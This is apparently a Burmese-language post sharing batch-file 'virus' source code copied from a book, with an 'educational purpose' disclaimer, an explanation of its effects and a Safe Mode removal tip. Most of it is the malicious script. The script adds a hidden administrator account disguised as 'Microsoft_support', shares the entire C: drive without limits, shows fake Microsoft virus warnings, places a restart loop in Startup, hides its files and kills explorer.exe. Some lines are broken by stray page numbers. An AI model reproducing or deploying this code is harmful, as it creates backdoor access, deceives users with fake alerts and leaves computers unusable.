C_relwarC708 v1.0 Virus Source Code

Bat File Programming စာအုပ္မွာေတြ႕တာကုိ ဖတ္မိျပီး တင္လုိက္တာပါ။ Educational Purpose သက္သက္သာျဖစ္ေၾကာင္း တင္ျပလုိပါတယ္။ ဒါေၾကာင့္ ဒီကုတ္ေတြကုိ မဟုတ္တဲ့ေနရာမွာ အသုံးမခ်ၾကပါနဲ႔။ ေအာက္က code line ေတြကုိ Notepad ေပၚမွာ Copy>paste လုပ္ျပီး .bat ဖုိင္နဲ႕သိမ္းလုိက္ရင္ရပါတယ္။ ဒီကုဒ္ ဘယ္လုိ အလုပ္လုပ္လဲဆုိတာ အနည္းငယ္ရွင္းျပပါမယ္။ ပထမဆုံးကေတာ့ C:|Windows\System32 ေအာက္မွာ 1001 ဆုိတဲ့ Folder, Microsoft_support ဆုိတဲ့ user account နဲ႕အတူ အခ်ိန္ကုိ 12:00 နဲ႕ Date ကုိ 01-01-2000 

အျဖစ္ေျပာင္းပစ္လုိက္ပါတယ္။ ျပီးေတာ့ Microsoft_support အေကာင့္က Administrative right ျဖစ္တယ္ေနာ္။ ေနာက္ warnusr.vbs ဆုိတဲ့ VB Script ဖုိင္ကုိတည္ေဆာက္လုိက္ျပီး "Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or Press No to Ignore the Virus" ဆုိတဲ့စာသား Message ေပၚလာပါမယ္။ မသိရင္ေတာ့ Microsoft ကပုိ႔ထားသလုိလုိေပါ့ဗ်ာ။ Code Line က System ရဲ႕  Date နဲ႕ Time ကုိ 12:01 နဲ႕ 12:02 မွာေျပာင္းထားျပီးသားျဖစ္လုိ႔  "You are requested to restart your Computer Now to prevent Damages or Data loss" ဆုိတဲ့ Message ကုိျမင္ရပါမယ္။ အေၾကာင္းမသိတဲ့ User တစ္ေယာက္က Restart လုပ္ရင္ ခင္ဗ်ားကြန္ပ်ဴတာက Restart နဲ႕လည္ေနမွာျဖစ္ပါတယ္။ ေျဖရွင္းရန္နည္းလမ္းကေတာ့ ကြန္ပ်ဴတာကုိ Safe Mode နဲ႕ဝင္ျပီး C:\Windows\System32 ေအာက္က 1001 ဆုိတဲ့ Folder ကုိ Delete လုပ္ရမွာျဖစ္ပါတယ္။

@echo off

cd\

cd %SystemRoot%\system32\

md 1001

cd\

cls

rem N0 H4rm 15 cau53d unt1| N0w

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| ch4ng3 th3 t1m3 2 12:00:00.0 & d4t3 as 01/01/2000

echo 12:00:00.00 | time >> nul

echo 01/01/2000 | date >> nul

net users Microsoft_support support /add

rem Th3 u53r 4cc0unt th4t w45 Cr34t3d 15 ju5t 4 |1m1t3d 4cc0unt

rem Th15 p13c3 0f c0d3 w1|| m4k3 th3 |1m1t3d u53r 4cc0unt5 t0 4dm1n15tr4t0r 4cc0unt.

net localgroup administrators Microsoft_support /add

rem 5h4r3 th3 R00t Dr1v3

net share system=C:\ /UNLIMITED

cd %SystemRoot%\system32\1001

echo deal=msgbox (”Microsoft Windows recently had found some Malicious Virus on your

computer, Press Yes to Neutralize the virus or Press No to Ignore the Virus”,20,”Warning”) >

%SystemRoot%\system32\1001\warnusr.vbs

rem ch4ng35 th3 k3yb04rd 53tt1ng5 ( r4t3 4nd d3|4y )

mode con rate=1 > nul

mode con delay=4 >> nul129

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y 50m3 4nn0y1ng m5g, as c0d3d ab0v3, 3×4ct|y

@ 12:01 and 12:02

at 12:01 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”

at 12:02 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”

msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” > nul

msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” >>

nul

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| c0py th3 warnusr.vbs f1|3 2 th3 5t4rtup, th4t w1|| b3

3×3cut3d @ 3v3ryt1me th3 c0mput3r 5t4rt5

copy %SystemRoot%\system32\1001\warnusr.vbs “%systemdrive%\Documents and Settings\All

Users\Start Menu\Programs\Startup\warnusr.vbs”

rem

***************************************************************************

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y Th3 5hutd0wn d14|05 B0X w1th 50m3 m5g and

w1|| r35t4rt c0nt1nu0u5|y

echo shutdown -r -t 00 -c “Microsoft has encountered a seriuos problem, which needs your

attention right now. Hey your computer got infected by Virus. Not even a single anti-virus can

detect this virus now. Wanna try? Hahahaha….! ” > %systemroot%\system32\1001\sd.bat

copy %systemroot%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat

“%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat”

rem

***************************************************************************

cd\

cls

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| m4k3 th3 v1ru5 b1t 5t34|th13r

cd %systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\

attrib +h +s +r warnusr.vbs

attrib +h +s +r sd.bat

cd\130

cd %systemroot%\system32

attrib +h +s +r 1001

rem K1||5 th3 3xp|0r3r.3×3 Pr0c355

taskkill /F /IM explorer.exe

rem @ EOV // End of Virus